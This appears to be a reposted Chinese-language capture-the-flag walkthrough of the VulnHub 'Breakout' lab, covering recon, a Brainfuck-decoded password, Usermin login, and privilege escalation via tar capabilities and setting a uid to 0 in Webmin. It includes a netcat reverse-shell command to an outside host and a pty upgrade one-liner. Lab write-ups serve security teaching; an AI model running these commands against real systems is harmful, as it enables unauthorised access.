Vulnhub_Breakout
Posted NowSec
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Vulnhub_Breakout相关的知识,希望对你有一定的参考价值。
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。
因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无关
主机信息
kali:192.168.3.143
BreakOut:192.168.3.142信息收集
使用nmap探测目标主机端口4个端口,并且3个为http
nmap -A -p- -T4 -v 192.168.3.142
访问80端口是一个默认的apache httpd的页面
查看网页源码在最下面发现一行注释
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
解密后得到一个看起来像密码的东西
.2uqPEfj3D<P'a-3
访问10000端口看到时一个登录页面
访问20000端口也是一个usermin的登录页面
使用whatweb获取到了两个端口程序的版本信息
使用默认口令无法登录到两个系统,然后对445端口进行探测发现一个用户名
enum4linux -A 192.168.3.142
经过尝试使用用户名cyber和之前获得的密码登录到了usermin
在文件管理中找到一个user.txt下载后查看找到第一个flag
3mp!r3You_Manage_To_Break_To_My_Secure_Access
进一步查看后发现tar具有root权限
GETSHELL
查看web页面发现有一个可以执行命令的地方
执行后发现这正是以cyber权限在执行的shell命令
执行nc后发现这台服务器有nc命令
执行反弹shell
监听:nc -lvvp 4321
反弹:nc 192.168.3.143 4321 -e /bin/bash
使用python获取一个tty shell
python3 -c 'import pty; pty.spawn("/bin/bash");'
使用getcap命令来查看这个可执行文件的权限,通过下面的对照,我们可以获得这个tar文件可以读取任意文件
CAP_CHOWN:修改文件属主的权限
CAP_DAC_OVERRIDE:忽略文件的DAC访问限制
CAP_DAC_READ_SEARCH:忽略文件读及目录搜索的DAC访问限制
CAP_FOWNER:忽略文件属主ID必须和进程用户ID相匹配的限制
CAP_FSETID:允许设置文件的setuid位
CAP_KILL:允许对不属于自己的进程发送信号
CAP_SETGID:允许改变进程的组
IDCAP_SETUID:允许改变进程的用户
IDCAP_SETPCAP:允许向其他进程转移能力以及删除其他进程的能力
CAP_LINUX_IMMUTABLE:允许修改文件的IMMUTABLE和APPEND属性标志CAP_NET_BIND_SERVICE:允许绑定到小于1024的端口
CAP_NET_BROADCAST:允许网络广播和多播访问
CAP_NET_ADMIN:允许执行网络管理任务
CAP_NET_RAW:允许使用原始套接字
CAP_IPC_LOCK:允许锁定共享内存片段
CAP_IPC_OWNER:忽略IPC所有权检查
CAP_SYS_MODULE:允许插入和删除内核模块
CAP_SYS_RAWIO:允许直接访问/devport,/dev/mem,/dev/kmem及原始块设备CAP_SYS_CHROOT:允许使用chroot()系统调用
CAP_SYS_PTRACE:允许跟踪任何进程
CAP_SYS_PACCT:允许执行进程的BSD式审计
CAP_SYS_ADMIN:允许执行系统管理任务,如加载或卸载文件系统、设置磁盘配额等
CAP_SYS_BOOT:允许重新启动系统
CAP_SYS_NICE:允许提升优先级及设置其他进程的优先级
CAP_SYS_RESOURCE:忽略资源限制
CAP_SYS_TIME:允许改变系统时钟
CAP_SYS_TTY_CONFIG:允许配置TTY设备
CAP_MKNOD:允许使用mknod()系统调用
CAP_LEASE:允许修改文件锁的FL_LEASE标志然后查找文件目录找到一个密码备份文件,但是我们无法直接读取,首先将文件使用cyber下的tar进行打包
解压后查看文件得到密码
提权
使用得到的密码登录webmin可以正常登录
在查看系统功能的时候发现可以修改密码
当连接的时候发现连接被拒绝,因为ssh没有监听
我们在用户和组配置中将cyber添加进root组
并且将user id修改为0
然后在usermin中查看用户的权限
最终进入root用户拿到Flag
加入我的星球
下方查看历史文章
扫描二维码
获取更多精彩
NowSec
以上是关于Vulnhub_Breakout的主要内容,如果未能解决你的问题,请参考以下文章